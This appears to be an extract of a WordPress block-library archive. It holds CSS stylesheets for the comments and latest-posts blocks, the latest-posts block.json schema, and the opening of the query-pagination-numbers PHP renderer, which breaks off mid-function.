.wp-block-post-comments .comment-meta .comment-awaiting-moderation{
  display:block;
  margin-bottom:1em;
  margin-top:1em;
}
.wp-block-post-comments .comment-body .commentmetadata{
  font-size:.875em;
}
.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{
  display:block;
  margin-bottom:.25em;
}
.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{
  box-sizing:border-box;
  display:block;
  width:100%;
}
.wp-block-post-comments .comment-form-cookies-consent{
  display:flex;
  gap:.25em;
}
.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{
  margin-top:.35em;
}
.wp-block-post-comments .comment-reply-title{
  margin-bottom:0;
}
.wp-block-post-comments .comment-reply-title :where(small){
  font-size:var(--wp--preset--font-size--medium, smaller);
  margin-left:.5em;
}
.wp-block-post-comments .reply{
  font-size:.875em;
  margin-bottom:1.4em;
}
.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{
  border:1px solid #949494;
  font-family:inherit;
  font-size:1em;
}
.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{
  padding:calc(.667em + 2px);
}

:where(.wp-block-post-comments input[type=submit]){
  border:none;
}comments/editor-rtl.min.css000060400000010411151330427370011750 0ustar00.wp-block-comments__legacy-placeholder,.wp-block-post-comments{box-sizing:border-box}.wp-block-comments__legacy-placeholder .alignleft,.wp-block-post-comments .alignleft{float:right}.wp-block-comments__legacy-placeholder .alignright,.wp-block-post-comments .alignright{float:left}.wp-block-comments__legacy-placeholder .navigation:after,.wp-block-post-comments .navigation:after{clear:both;content:"";display:table}.wp-block-comments__legacy-placeholder .commentlist,.wp-block-post-comments .commentlist{clear:both;list-style:none;margin:0;padding:0}.wp-block-comments__legacy-placeholder .commentlist .comment,.wp-block-post-comments .commentlist .comment{min-height:2.25em;padding-right:3.25em}.wp-block-comments__legacy-placeholder .commentlist .comment p,.wp-block-post-comments .commentlist .comment p{font-size:1em;line-height:1.8;margin:1em 0}.wp-block-comments__legacy-placeholder .commentlist .children,.wp-block-post-comments .commentlist .children{list-style:none;margin:0;padding:0}.wp-block-comments__legacy-placeholder .comment-author,.wp-block-post-comments .comment-author{line-height:1.5}.wp-block-comments__legacy-placeholder .comment-author .avatar,.wp-block-post-comments .comment-author .avatar{border-radius:1.5em;display:block;float:right;height:2.5em;margin-left:.75em;margin-top:.5em;width:2.5em}.wp-block-comments__legacy-placeholder .comment-author cite,.wp-block-post-comments .comment-author cite{font-style:normal}.wp-block-comments__legacy-placeholder .comment-meta,.wp-block-post-comments .comment-meta{font-size:.875em;line-height:1.5}.wp-block-comments__legacy-placeholder .comment-meta b,.wp-block-post-comments .comment-meta b{font-weight:400}.wp-block-comments__legacy-placeholder .comment-meta .comment-awaiting-moderation,.wp-block-post-comments .comment-meta .comment-awaiting-moderation{display:block;margin-bottom:1em;margin-top:1em}.wp-block-comments__legacy-placeholder .comment-body .commentmetadata,.wp-block-post-comments .comment-body .commentmetadata{font-size:.875em}.wp-block-comments__legacy-placeholder .comment-form-author label,.wp-block-comments__legacy-placeholder .comment-form-comment label,.wp-block-comments__legacy-placeholder .comment-form-email label,.wp-block-comments__legacy-placeholder .comment-form-url label,.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-comments__legacy-placeholder .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder .comment-form textarea,.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-comments__legacy-placeholder .comment-form-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-comments__legacy-placeholder .comment-form-cookies-consent #wp-comment-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-comments__legacy-placeholder .comment-reply-title,.wp-block-post-comments .comment-reply-title{margin-bottom:0}.wp-block-comments__legacy-placeholder .comment-reply-title :where(small),.wp-block-post-comments .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-right:.5em}.wp-block-comments__legacy-placeholder .reply,.wp-block-post-comments .reply{font-size:.875em;margin-bottom:1.4em}.wp-block-comments__legacy-placeholder input:not([type=submit]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-comments__legacy-placeholder input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit]){border:none}.block-library-comments-toolbar__popover .components-popover__content{min-width:230px}.wp-block-comments__legacy-placeholder *{pointer-events:none}comments/style.min.css000060400000004426151330427370011034 0ustar00.wp-block-post-comments{box-sizing:border-box}.wp-block-post-comments .alignleft{float:left}.wp-block-post-comments .alignright{float:right}.wp-block-post-comments .navigation:after{clear:both;content:"";display:table}.wp-block-post-comments .commentlist{clear:both;list-style:none;margin:0;padding:0}.wp-block-post-comments .commentlist .comment{min-height:2.25em;padding-left:3.25em}.wp-block-post-comments .commentlist .comment p{font-size:1em;line-height:1.8;margin:1em 0}.wp-block-post-comments .commentlist .children{list-style:none;margin:0;padding:0}.wp-block-post-comments .comment-author{line-height:1.5}.wp-block-post-comments .comment-author .avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;margin-top:.5em;width:2.5em}.wp-block-post-comments .comment-author cite{font-style:normal}.wp-block-post-comments .comment-meta{font-size:.875em;line-height:1.5}.wp-block-post-comments .comment-meta b{font-weight:400}.wp-block-post-comments .comment-meta .comment-awaiting-moderation{display:block;margin-bottom:1em;margin-top:1em}.wp-block-post-comments .comment-body .commentmetadata{font-size:.875em}.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments .comment-reply-title{margin-bottom:0}.wp-block-post-comments .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-left:.5em}.wp-block-post-comments .reply{font-size:.875em;margin-bottom:1.4em}.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit]){border:none}comments/editor.css000060400000010775151330427370010404 0ustar00.wp-block-comments__legacy-placeholder,.wp-block-post-comments{
  box-sizing:border-box;
}
.wp-block-comments__legacy-placeholder .alignleft,.wp-block-post-comments .alignleft{
  float:left;
}
.wp-block-comments__legacy-placeholder .alignright,.wp-block-post-comments .alignright{
  float:right;
}
.wp-block-comments__legacy-placeholder .navigation:after,.wp-block-post-comments .navigation:after{
  clear:both;
  content:"";
  display:table;
}
.wp-block-comments__legacy-placeholder .commentlist,.wp-block-post-comments .commentlist{
  clear:both;
  list-style:none;
  margin:0;
  padding:0;
}
.wp-block-comments__legacy-placeholder .commentlist .comment,.wp-block-post-comments .commentlist .comment{
  min-height:2.25em;
  padding-left:3.25em;
}
.wp-block-comments__legacy-placeholder .commentlist .comment p,.wp-block-post-comments .commentlist .comment p{
  font-size:1em;
  line-height:1.8;
  margin:1em 0;
}
.wp-block-comments__legacy-placeholder .commentlist .children,.wp-block-post-comments .commentlist .children{
  list-style:none;
  margin:0;
  padding:0;
}
.wp-block-comments__legacy-placeholder .comment-author,.wp-block-post-comments .comment-author{
  line-height:1.5;
}
.wp-block-comments__legacy-placeholder .comment-author .avatar,.wp-block-post-comments .comment-author .avatar{
  border-radius:1.5em;
  display:block;
  float:left;
  height:2.5em;
  margin-right:.75em;
  margin-top:.5em;
  width:2.5em;
}
.wp-block-comments__legacy-placeholder .comment-author cite,.wp-block-post-comments .comment-author cite{
  font-style:normal;
}
.wp-block-comments__legacy-placeholder .comment-meta,.wp-block-post-comments .comment-meta{
  font-size:.875em;
  line-height:1.5;
}
.wp-block-comments__legacy-placeholder .comment-meta b,.wp-block-post-comments .comment-meta b{
  font-weight:400;
}
.wp-block-comments__legacy-placeholder .comment-meta .comment-awaiting-moderation,.wp-block-post-comments .comment-meta .comment-awaiting-moderation{
  display:block;
  margin-bottom:1em;
  margin-top:1em;
}
.wp-block-comments__legacy-placeholder .comment-body .commentmetadata,.wp-block-post-comments .comment-body .commentmetadata{
  font-size:.875em;
}
.wp-block-comments__legacy-placeholder .comment-form-author label,.wp-block-comments__legacy-placeholder .comment-form-comment label,.wp-block-comments__legacy-placeholder .comment-form-email label,.wp-block-comments__legacy-placeholder .comment-form-url label,.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{
  display:block;
  margin-bottom:.25em;
}
.wp-block-comments__legacy-placeholder .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder .comment-form textarea,.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{
  box-sizing:border-box;
  display:block;
  width:100%;
}
.wp-block-comments__legacy-placeholder .comment-form-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent{
  display:flex;
  gap:.25em;
}
.wp-block-comments__legacy-placeholder .comment-form-cookies-consent #wp-comment-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{
  margin-top:.35em;
}
.wp-block-comments__legacy-placeholder .comment-reply-title,.wp-block-post-comments .comment-reply-title{
  margin-bottom:0;
}
.wp-block-comments__legacy-placeholder .comment-reply-title :where(small),.wp-block-post-comments .comment-reply-title :where(small){
  font-size:var(--wp--preset--font-size--medium, smaller);
  margin-left:.5em;
}
.wp-block-comments__legacy-placeholder .reply,.wp-block-post-comments .reply{
  font-size:.875em;
  margin-bottom:1.4em;
}
.wp-block-comments__legacy-placeholder input:not([type=submit]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{
  border:1px solid #949494;
  font-family:inherit;
  font-size:1em;
}
.wp-block-comments__legacy-placeholder input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{
  padding:calc(.667em + 2px);
}

:where(.wp-block-post-comments input[type=submit]){
  border:none;
}

.block-library-comments-toolbar__popover .components-popover__content{
  min-width:230px;
}

.wp-block-comments__legacy-placeholder *{
  pointer-events:none;
}comments/style-rtl.min.css000060400000004430151330427370011626 0ustar00.wp-block-post-comments{box-sizing:border-box}.wp-block-post-comments .alignleft{float:right}.wp-block-post-comments .alignright{float:left}.wp-block-post-comments .navigation:after{clear:both;content:"";display:table}.wp-block-post-comments .commentlist{clear:both;list-style:none;margin:0;padding:0}.wp-block-post-comments .commentlist .comment{min-height:2.25em;padding-right:3.25em}.wp-block-post-comments .commentlist .comment p{font-size:1em;line-height:1.8;margin:1em 0}.wp-block-post-comments .commentlist .children{list-style:none;margin:0;padding:0}.wp-block-post-comments .comment-author{line-height:1.5}.wp-block-post-comments .comment-author .avatar{border-radius:1.5em;display:block;float:right;height:2.5em;margin-left:.75em;margin-top:.5em;width:2.5em}.wp-block-post-comments .comment-author cite{font-style:normal}.wp-block-post-comments .comment-meta{font-size:.875em;line-height:1.5}.wp-block-post-comments .comment-meta b{font-weight:400}.wp-block-post-comments .comment-meta .comment-awaiting-moderation{display:block;margin-bottom:1em;margin-top:1em}.wp-block-post-comments .comment-body .commentmetadata{font-size:.875em}.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments .comment-reply-title{margin-bottom:0}.wp-block-post-comments .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-right:.5em}.wp-block-post-comments .reply{font-size:.875em;margin-bottom:1.4em}.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit]){border:none}comments/editor.min.css000060400000010407151330427370011156 0ustar00.wp-block-comments__legacy-placeholder,.wp-block-post-comments{box-sizing:border-box}.wp-block-comments__legacy-placeholder .alignleft,.wp-block-post-comments .alignleft{float:left}.wp-block-comments__legacy-placeholder .alignright,.wp-block-post-comments .alignright{float:right}.wp-block-comments__legacy-placeholder .navigation:after,.wp-block-post-comments .navigation:after{clear:both;content:"";display:table}.wp-block-comments__legacy-placeholder .commentlist,.wp-block-post-comments .commentlist{clear:both;list-style:none;margin:0;padding:0}.wp-block-comments__legacy-placeholder .commentlist .comment,.wp-block-post-comments .commentlist .comment{min-height:2.25em;padding-left:3.25em}.wp-block-comments__legacy-placeholder .commentlist .comment p,.wp-block-post-comments .commentlist .comment p{font-size:1em;line-height:1.8;margin:1em 0}.wp-block-comments__legacy-placeholder .commentlist .children,.wp-block-post-comments .commentlist .children{list-style:none;margin:0;padding:0}.wp-block-comments__legacy-placeholder .comment-author,.wp-block-post-comments .comment-author{line-height:1.5}.wp-block-comments__legacy-placeholder .comment-author .avatar,.wp-block-post-comments .comment-author .avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;margin-top:.5em;width:2.5em}.wp-block-comments__legacy-placeholder .comment-author cite,.wp-block-post-comments .comment-author cite{font-style:normal}.wp-block-comments__legacy-placeholder .comment-meta,.wp-block-post-comments .comment-meta{font-size:.875em;line-height:1.5}.wp-block-comments__legacy-placeholder .comment-meta b,.wp-block-post-comments .comment-meta b{font-weight:400}.wp-block-comments__legacy-placeholder .comment-meta .comment-awaiting-moderation,.wp-block-post-comments .comment-meta .comment-awaiting-moderation{display:block;margin-bottom:1em;margin-top:1em}.wp-block-comments__legacy-placeholder .comment-body .commentmetadata,.wp-block-post-comments .comment-body .commentmetadata{font-size:.875em}.wp-block-comments__legacy-placeholder .comment-form-author label,.wp-block-comments__legacy-placeholder .comment-form-comment label,.wp-block-comments__legacy-placeholder .comment-form-email label,.wp-block-comments__legacy-placeholder .comment-form-url label,.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-comments__legacy-placeholder .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder .comment-form textarea,.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-comments__legacy-placeholder .comment-form-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-comments__legacy-placeholder .comment-form-cookies-consent #wp-comment-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-comments__legacy-placeholder .comment-reply-title,.wp-block-post-comments .comment-reply-title{margin-bottom:0}.wp-block-comments__legacy-placeholder .comment-reply-title :where(small),.wp-block-post-comments .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-left:.5em}.wp-block-comments__legacy-placeholder .reply,.wp-block-post-comments .reply{font-size:.875em;margin-bottom:1.4em}.wp-block-comments__legacy-placeholder input:not([type=submit]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-comments__legacy-placeholder input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit]){border:none}.block-library-comments-toolbar__popover .components-popover__content{min-width:230px}.wp-block-comments__legacy-placeholder *{pointer-events:none}latest-posts/editor.css000060400000000715151330427370011212 0ustar00.wp-block-latest-posts>li{
  overflow:hidden;
}

.wp-block-latest-posts li a>div{
  display:inline;
}

.editor-latest-posts-image-alignment-control .components-base-control__label{
  display:block;
}
.editor-latest-posts-image-alignment-control .components-toolbar{
  border-radius:2px;
}

:root :where(.wp-block-latest-posts){
  padding-left:2.5em;
}

:root :where(.wp-block-latest-posts.is-grid),:root :where(.wp-block-latest-posts__list){
  padding-left:0;
}latest-posts/editor.min.css000060400000000646151330427370011777 0ustar00.wp-block-latest-posts>li{overflow:hidden}.wp-block-latest-posts li a>div{display:inline}.editor-latest-posts-image-alignment-control .components-base-control__label{display:block}.editor-latest-posts-image-alignment-control .components-toolbar{border-radius:2px}:root :where(.wp-block-latest-posts){padding-left:2.5em}:root :where(.wp-block-latest-posts.is-grid),:root :where(.wp-block-latest-posts__list){padding-left:0}latest-posts/editor-rtl.min.css000060400000000650151330427370012571 0ustar00.wp-block-latest-posts>li{overflow:hidden}.wp-block-latest-posts li a>div{display:inline}.editor-latest-posts-image-alignment-control .components-base-control__label{display:block}.editor-latest-posts-image-alignment-control .components-toolbar{border-radius:2px}:root :where(.wp-block-latest-posts){padding-right:2.5em}:root :where(.wp-block-latest-posts.is-grid),:root :where(.wp-block-latest-posts__list){padding-right:0}latest-posts/style-rtl.css000060400000003772151330427370011671 0ustar00.wp-block-latest-posts{
  box-sizing:border-box;
}
.wp-block-latest-posts.alignleft{
  margin-right:2em;
}
.wp-block-latest-posts.alignright{
  margin-left:2em;
}
.wp-block-latest-posts.wp-block-latest-posts__list{
  list-style:none;
}
.wp-block-latest-posts.wp-block-latest-posts__list li{
  clear:both;
  overflow-wrap:break-word;
}
.wp-block-latest-posts.is-grid{
  display:flex;
  flex-wrap:wrap;
}
.wp-block-latest-posts.is-grid li{
  margin:0 0 1.25em 1.25em;
  width:100%;
}
@media (min-width:600px){
  .wp-block-latest-posts.columns-2 li{
    width:calc(50% - .625em);
  }
  .wp-block-latest-posts.columns-2 li:nth-child(2n){
    margin-left:0;
  }
  .wp-block-latest-posts.columns-3 li{
    width:calc(33.33333% - .83333em);
  }
  .wp-block-latest-posts.columns-3 li:nth-child(3n){
    margin-left:0;
  }
  .wp-block-latest-posts.columns-4 li{
    width:calc(25% - .9375em);
  }
  .wp-block-latest-posts.columns-4 li:nth-child(4n){
    margin-left:0;
  }
  .wp-block-latest-posts.columns-5 li{
    width:calc(20% - 1em);
  }
  .wp-block-latest-posts.columns-5 li:nth-child(5n){
    margin-left:0;
  }
  .wp-block-latest-posts.columns-6 li{
    width:calc(16.66667% - 1.04167em);
  }
  .wp-block-latest-posts.columns-6 li:nth-child(6n){
    margin-left:0;
  }
}

:root :where(.wp-block-latest-posts.is-grid){
  padding:0;
}
:root :where(.wp-block-latest-posts.wp-block-latest-posts__list){
  padding-right:0;
}

.wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{
  display:block;
  font-size:.8125em;
}

.wp-block-latest-posts__post-excerpt{
  margin-bottom:1em;
  margin-top:.5em;
}

.wp-block-latest-posts__featured-image a{
  display:inline-block;
}
.wp-block-latest-posts__featured-image img{
  height:auto;
  max-width:100%;
  width:auto;
}
.wp-block-latest-posts__featured-image.alignleft{
  float:left;
  margin-right:1em;
}
.wp-block-latest-posts__featured-image.alignright{
  float:right;
  margin-left:1em;
}
.wp-block-latest-posts__featured-image.aligncenter{
  margin-bottom:1em;
  text-align:center;
}latest-posts/style.css000060400000003776151330427370011076 0ustar00.wp-block-latest-posts{
  box-sizing:border-box;
}
.wp-block-latest-posts.alignleft{
  margin-right:2em;
}
.wp-block-latest-posts.alignright{
  margin-left:2em;
}
.wp-block-latest-posts.wp-block-latest-posts__list{
  list-style:none;
}
.wp-block-latest-posts.wp-block-latest-posts__list li{
  clear:both;
  overflow-wrap:break-word;
}
.wp-block-latest-posts.is-grid{
  display:flex;
  flex-wrap:wrap;
}
.wp-block-latest-posts.is-grid li{
  margin:0 1.25em 1.25em 0;
  width:100%;
}
@media (min-width:600px){
  .wp-block-latest-posts.columns-2 li{
    width:calc(50% - .625em);
  }
  .wp-block-latest-posts.columns-2 li:nth-child(2n){
    margin-right:0;
  }
  .wp-block-latest-posts.columns-3 li{
    width:calc(33.33333% - .83333em);
  }
  .wp-block-latest-posts.columns-3 li:nth-child(3n){
    margin-right:0;
  }
  .wp-block-latest-posts.columns-4 li{
    width:calc(25% - .9375em);
  }
  .wp-block-latest-posts.columns-4 li:nth-child(4n){
    margin-right:0;
  }
  .wp-block-latest-posts.columns-5 li{
    width:calc(20% - 1em);
  }
  .wp-block-latest-posts.columns-5 li:nth-child(5n){
    margin-right:0;
  }
  .wp-block-latest-posts.columns-6 li{
    width:calc(16.66667% - 1.04167em);
  }
  .wp-block-latest-posts.columns-6 li:nth-child(6n){
    margin-right:0;
  }
}

:root :where(.wp-block-latest-posts.is-grid){
  padding:0;
}
:root :where(.wp-block-latest-posts.wp-block-latest-posts__list){
  padding-left:0;
}

.wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{
  display:block;
  font-size:.8125em;
}

.wp-block-latest-posts__post-excerpt{
  margin-bottom:1em;
  margin-top:.5em;
}

.wp-block-latest-posts__featured-image a{
  display:inline-block;
}
.wp-block-latest-posts__featured-image img{
  height:auto;
  max-width:100%;
  width:auto;
}
.wp-block-latest-posts__featured-image.alignleft{
  float:left;
  margin-right:1em;
}
.wp-block-latest-posts__featured-image.alignright{
  float:right;
  margin-left:1em;
}
.wp-block-latest-posts__featured-image.aligncenter{
  margin-bottom:1em;
  text-align:center;
}latest-posts/style-rtl.min.css000060400000003377151330427370012454 0ustar00.wp-block-latest-posts{box-sizing:border-box}.wp-block-latest-posts.alignleft{margin-right:2em}.wp-block-latest-posts.alignright{margin-left:2em}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none}.wp-block-latest-posts.wp-block-latest-posts__list li{clear:both;overflow-wrap:break-word}.wp-block-latest-posts.is-grid{display:flex;flex-wrap:wrap}.wp-block-latest-posts.is-grid li{margin:0 0 1.25em 1.25em;width:100%}@media (min-width:600px){.wp-block-latest-posts.columns-2 li{width:calc(50% - .625em)}.wp-block-latest-posts.columns-2 li:nth-child(2n){margin-left:0}.wp-block-latest-posts.columns-3 li{width:calc(33.33333% - .83333em)}.wp-block-latest-posts.columns-3 li:nth-child(3n){margin-left:0}.wp-block-latest-posts.columns-4 li{width:calc(25% - .9375em)}.wp-block-latest-posts.columns-4 li:nth-child(4n){margin-left:0}.wp-block-latest-posts.columns-5 li{width:calc(20% - 1em)}.wp-block-latest-posts.columns-5 li:nth-child(5n){margin-left:0}.wp-block-latest-posts.columns-6 li{width:calc(16.66667% - 1.04167em)}.wp-block-latest-posts.columns-6 li:nth-child(6n){margin-left:0}}:root :where(.wp-block-latest-posts.is-grid){padding:0}:root :where(.wp-block-latest-posts.wp-block-latest-posts__list){padding-right:0}.wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{display:block;font-size:.8125em}.wp-block-latest-posts__post-excerpt{margin-bottom:1em;margin-top:.5em}.wp-block-latest-posts__featured-image a{display:inline-block}.wp-block-latest-posts__featured-image img{height:auto;max-width:100%;width:auto}.wp-block-latest-posts__featured-image.alignleft{float:left;margin-right:1em}.wp-block-latest-posts__featured-image.alignright{float:right;margin-left:1em}.wp-block-latest-posts__featured-image.aligncenter{margin-bottom:1em;text-align:center}latest-posts/style.min.css000060400000003403151330427370011643 0ustar00.wp-block-latest-posts{box-sizing:border-box}.wp-block-latest-posts.alignleft{margin-right:2em}.wp-block-latest-posts.alignright{margin-left:2em}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none}.wp-block-latest-posts.wp-block-latest-posts__list li{clear:both;overflow-wrap:break-word}.wp-block-latest-posts.is-grid{display:flex;flex-wrap:wrap}.wp-block-latest-posts.is-grid li{margin:0 1.25em 1.25em 0;width:100%}@media (min-width:600px){.wp-block-latest-posts.columns-2 li{width:calc(50% - .625em)}.wp-block-latest-posts.columns-2 li:nth-child(2n){margin-right:0}.wp-block-latest-posts.columns-3 li{width:calc(33.33333% - .83333em)}.wp-block-latest-posts.columns-3 li:nth-child(3n){margin-right:0}.wp-block-latest-posts.columns-4 li{width:calc(25% - .9375em)}.wp-block-latest-posts.columns-4 li:nth-child(4n){margin-right:0}.wp-block-latest-posts.columns-5 li{width:calc(20% - 1em)}.wp-block-latest-posts.columns-5 li:nth-child(5n){margin-right:0}.wp-block-latest-posts.columns-6 li{width:calc(16.66667% - 1.04167em)}.wp-block-latest-posts.columns-6 li:nth-child(6n){margin-right:0}}:root :where(.wp-block-latest-posts.is-grid){padding:0}:root :where(.wp-block-latest-posts.wp-block-latest-posts__list){padding-left:0}.wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{display:block;font-size:.8125em}.wp-block-latest-posts__post-excerpt{margin-bottom:1em;margin-top:.5em}.wp-block-latest-posts__featured-image a{display:inline-block}.wp-block-latest-posts__featured-image img{height:auto;max-width:100%;width:auto}.wp-block-latest-posts__featured-image.alignleft{float:left;margin-right:1em}.wp-block-latest-posts__featured-image.alignright{float:right;margin-left:1em}.wp-block-latest-posts__featured-image.aligncenter{margin-bottom:1em;text-align:center}latest-posts/block.json000060400000004434151330427370011201 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/latest-posts",
	"title": "Latest Posts",
	"category": "widgets",
	"description": "Display a list of your most recent posts.",
	"keywords": [ "recent posts" ],
	"textdomain": "default",
	"attributes": {
		"categories": {
			"type": "array",
			"items": {
				"type": "object"
			}
		},
		"selectedAuthor": {
			"type": "number"
		},
		"postsToShow": {
			"type": "number",
			"default": 5
		},
		"displayPostContent": {
			"type": "boolean",
			"default": false
		},
		"displayPostContentRadio": {
			"type": "string",
			"default": "excerpt"
		},
		"excerptLength": {
			"type": "number",
			"default": 55
		},
		"displayAuthor": {
			"type": "boolean",
			"default": false
		},
		"displayPostDate": {
			"type": "boolean",
			"default": false
		},
		"postLayout": {
			"type": "string",
			"default": "list"
		},
		"columns": {
			"type": "number",
			"default": 3
		},
		"order": {
			"type": "string",
			"default": "desc"
		},
		"orderBy": {
			"type": "string",
			"default": "date"
		},
		"displayFeaturedImage": {
			"type": "boolean",
			"default": false
		},
		"featuredImageAlign": {
			"type": "string",
			"enum": [ "left", "center", "right" ]
		},
		"featuredImageSizeSlug": {
			"type": "string",
			"default": "thumbnail"
		},
		"featuredImageSizeWidth": {
			"type": "number",
			"default": null
		},
		"featuredImageSizeHeight": {
			"type": "number",
			"default": null
		},
		"addLinkToFeaturedImage": {
			"type": "boolean",
			"default": false
		}
	},
	"supports": {
		"align": true,
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-latest-posts-editor",
	"style": "wp-block-latest-posts"
}
latest-posts/editor-rtl.css000060400000000717151330427370012013 0ustar00.wp-block-latest-posts>li{
  overflow:hidden;
}

.wp-block-latest-posts li a>div{
  display:inline;
}

.editor-latest-posts-image-alignment-control .components-base-control__label{
  display:block;
}
.editor-latest-posts-image-alignment-control .components-toolbar{
  border-radius:2px;
}

:root :where(.wp-block-latest-posts){
  padding-right:2.5em;
}

:root :where(.wp-block-latest-posts.is-grid),:root :where(.wp-block-latest-posts__list){
  padding-right:0;
}query-pagination-numbers.php000060400000011242151330427370012223 0ustar00<?php
/**
 * Server-side rendering of the `core/query-pagination-numbers` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/query-pagination-numbers` block on the server.
 *
 * @since 5.8.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the pagination numbers for the Query.
 */
function render_block_core_query_pagination_numbers( $attributes, $content, $block ) {
	$page_key            = isset( $block->context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page';
	$enhanced_pagination = isset( $block->context['enhancedPagination'] ) && $block->context['enhancedPagination'];
	$page                = empty( $_GET[ $page_key ] ) ? 1 : (int) $_GET[ $page_key ];
